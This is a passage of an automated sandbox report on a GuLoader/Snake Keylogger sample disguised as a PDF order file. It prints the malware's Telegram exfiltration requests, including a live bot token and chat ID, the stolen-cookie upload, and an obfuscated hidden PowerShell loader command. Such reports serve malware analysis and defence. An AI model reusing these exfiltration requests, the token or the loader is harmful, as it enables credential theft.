<Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49782	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:16 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-21 09:37:17 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:17 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145746 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4LEJz6UkhNxG%2Bpl%2FjvY8iggoJ%2FRqpgOkbbaEhCxNHzuiLBQ8FEAgIBQQ3lVLwvsI9q8rSaOJY%2Bg7d1O9kvDSRT1QXhsU4gNAS3bqxoiwqm9sziRrhldp4LfRoVVXm5951w%2BQeaD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb341f9eb0f70-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1907250&cwnd=191&unsent_bytes=0&cid=7f9874400085a0dd&ts=471&x=0"
2024-11-21 09:37:17 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49789	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:20 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 09:37:20 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:20 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145749 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwD9vZCu%2B41G4B8QelzblhTab%2F4dXL52bl%2FpaC1GqHAILYSWpnz7V8PhE%2F8czLntsH3QsEF60BCH3tTNVBsE%2Fh0pkVsuIYBtWPPz5nhPp9TKMMXSIqx%2BepuH%2BMFx7wFgRZ5HlDem"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb357fba943f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2065&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1371535&cwnd=204&unsent_bytes=0&cid=b863a14c6254a2b4&ts=464&x=0"
2024-11-21 09:37:20 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49801	188.114.96.3	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:23 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-21 09:37:24 UTC	851	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 09:37:23 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 145752 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvE9HZgrJrH0VVwxM2Qa7drKnYfITvRbAquyGwq0Yf957i74Umz%2Bvtqmu59QvoFVJEVOW%2FRyHc1y43OkJpxqbvP2A42nwaSufitCqHKjT7GOC2OW%2B0fN65beQZyeyORxIjuV9wtD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5fb36c3adb1a17-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1785&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1610590&cwnd=127&unsent_bytes=0&cid=942876ccb62cfa81&ts=467&x=0"
2024-11-21 09:37:24 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49806	149.154.167.220	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:25 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-21 09:37:26 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 09:37:26 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-21 09:37:26 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49824	149.154.167.220	443	8044	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 09:37:34 UTC	350	OUT	POST /bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd0b53820095de Host: api.telegram.org Content-Length: 7045
2024-11-21 09:37:34 UTC	7045	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 62 35 33 38 32 30 30 39 35 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 34 37 36 38 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 31 2f 31 31 2f 32 30 32 34 20 2f Data Ascii: --------------------------8dd0b53820095deContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:347688Date and Time: 21/11/2024 /
2024-11-21 09:37:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 21 Nov 2024 09:37:34 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-21 09:37:34 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 36 35 35 32 36 37 34 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 61 6e 64 72 6f 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 61 6e 64 72 6f 73 73 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 31 38 31 38 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a Data Ascii: {"ok":true,"result":{"message_id":461,"from":{"id":8065526741,"is_bot":true,"first_name":"Vandross","username":"Vandross007_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1732181854,"document":{"file_name":

Target ID:	0
Start time:	04:36:03
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"
Imagebase:	0x400000
File size:	832'624 bytes
MD5 hash:	998E394361BD54C58A1AD2092FCA8B6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:36:04
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Barthianismens=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Familieskabet.Sch';$Architectures=$Barthianismens.SubString(9447,3);.$Architectures($Barthianismens) "
Imagebase:	0xd40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2048865185.0000000009EB9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:36:04
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:36:38
Start date:	21/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xfa0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	1335
Total number of Limit Nodes:	33

Executed Functions

Function 00403325 Relevance: 96.6, APIs: 33, Strings: 22, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040334A
GetVersion.KERNEL32 ref: 00403350
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403383
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033BF
OleInitialize.OLE32(00000000), ref: 004033C6
SHGetFileInfoA.SHELL32(0079E528,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033E2
GetCommandLineA.KERNEL32(Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004033F7
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",00000020,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",00000000,?,00000007,00000009,0000000B), ref: 00403433
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403530
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403541
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354D
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403561
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403569
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040357A
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403582
DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403596

Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A

Part of subcall function 004038E7: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,74DF3410), ref: 004039D7
Part of subcall function 004038E7: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
Part of subcall function 004038E7: GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
Part of subcall function 004038E7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E
Part of subcall function 004038E7: RegisterClassA.USER32(007A2700), ref: 00403A7B

ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 0040363F

Part of subcall function 0040380D: CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818

CoUninitialize.COMBASE(?,?,00000007,00000009,0000000B), ref: 00403644
ExitProcess.KERNEL32 ref: 00403665
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 00403782
OpenProcessToken.ADVAPI32(00000000), ref: 00403789
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A1
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C0
ExitWindowsEx.USER32(00000002,80040002), ref: 004037E4
ExitProcess.KERNEL32 ref: 00403807

Part of subcall function 004057F0: MessageBoxIndirectA.USER32(0040A218), ref: 0040584B

Strings

.tmp, xrefs: 0040368C
"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 004033FD, 00403403, 004035BA
C:\Users\user\AppData\Roaming\skittaget\lektier, xrefs: 00403515, 00403616, 004036C0, 004036C9
`Kt, xrefs: 0040356E
1033, xrefs: 00403591
UXTHEME, xrefs: 00403377, 0040337C, 00403382
C:\Users\user\AppData\Local\Temp\, xrefs: 00403525, 0040352A, 00403540, 0040354C, 0040355B, 00403568, 00403574, 0040357C, 00403675, 00403686, 00403691, 0040369D, 004036AA, 004036B9, 00403768
C:\Users\user\Desktop, xrefs: 00403697, 0040369C, 004036C8
TMP, xrefs: 0040357D
Clona $, xrefs: 004036D7
(y, xrefs: 004036F6
C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe, xrefs: 00403722
NSIS Error, xrefs: 004033E8
Error launching installer, xrefs: 004035FC
Bysamfund, xrefs: 004033ED
", xrefs: 00403458
SeShutdownPrivilege, xrefs: 0040379B
~nsu, xrefs: 00403670
C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111, xrefs: 00403621
TEMP, xrefs: 00403575
Low, xrefs: 00403563
\Temp, xrefs: 00403547

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: Clona $$"$"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$(y$.tmp$1033$Bysamfund$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111$C:\Users\user\Desktop$C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
API String ID: 562314493-648828614
Opcode ID: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
Instruction ID: 97d63beb8df843ca38620017436ed0801945ee3064957e10bbaedf14490df2b6
Opcode Fuzzy Hash: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
Instruction Fuzzy Hash: B6C1F7705047816ED7216F759D89A2F3EACAB86306F05453EF182B61D2CB7C8A15CB2F

Function 00405339 Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405398
GetDlgItem.USER32(?,000003EE), ref: 004053A7
GetClientRect.USER32(?,?), ref: 004053E4
GetSystemMetrics.USER32(00000002), ref: 004053EB
SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040540C
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040541D
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405430
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040543E
SendMessageA.USER32(?,00001024,00000000,?), ref: 00405451
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
ShowWindow.USER32(?,00000008), ref: 00405487
GetDlgItem.USER32(?,000003EC), ref: 004054A8
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054B8
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054D1
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054DD
GetDlgItem.USER32(?,000003F8), ref: 004053B6

Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B

GetDlgItem.USER32(?,000003EC), ref: 004054F9
CreateThread.KERNELBASE(00000000,00000000,Function_000052CD,00000000), ref: 00405507
CloseHandle.KERNELBASE(00000000), ref: 0040550E
ShowWindow.USER32(00000000), ref: 00405531
ShowWindow.USER32(?,00000008), ref: 00405538
ShowWindow.USER32(00000008), ref: 0040557E
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055B2
CreatePopupMenu.USER32 ref: 004055C3
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055D8
GetWindowRect.USER32(?,000000FF), ref: 004055F8
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564D
OpenClipboard.USER32(00000000), ref: 0040565D
EmptyClipboard.USER32 ref: 00405663
GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
GlobalLock.KERNEL32(00000000), ref: 00405676
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040568A
GlobalUnlock.KERNEL32(00000000), ref: 004056A3
SetClipboardData.USER32(00000001,00000000), ref: 004056AE
CloseClipboard.USER32 ref: 004056B4

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
Instruction ID: 684cfb1aaa76551445c09ef43b39d8f4d2da16edc43e4b0a600a882252a292b3
Opcode Fuzzy Hash: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
Instruction Fuzzy Hash: 4AA16C70900608BFDF119FA4DD89EAE7B79FB48354F00802AFA45BA1A1C7794E51DF58

Function 00406448 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

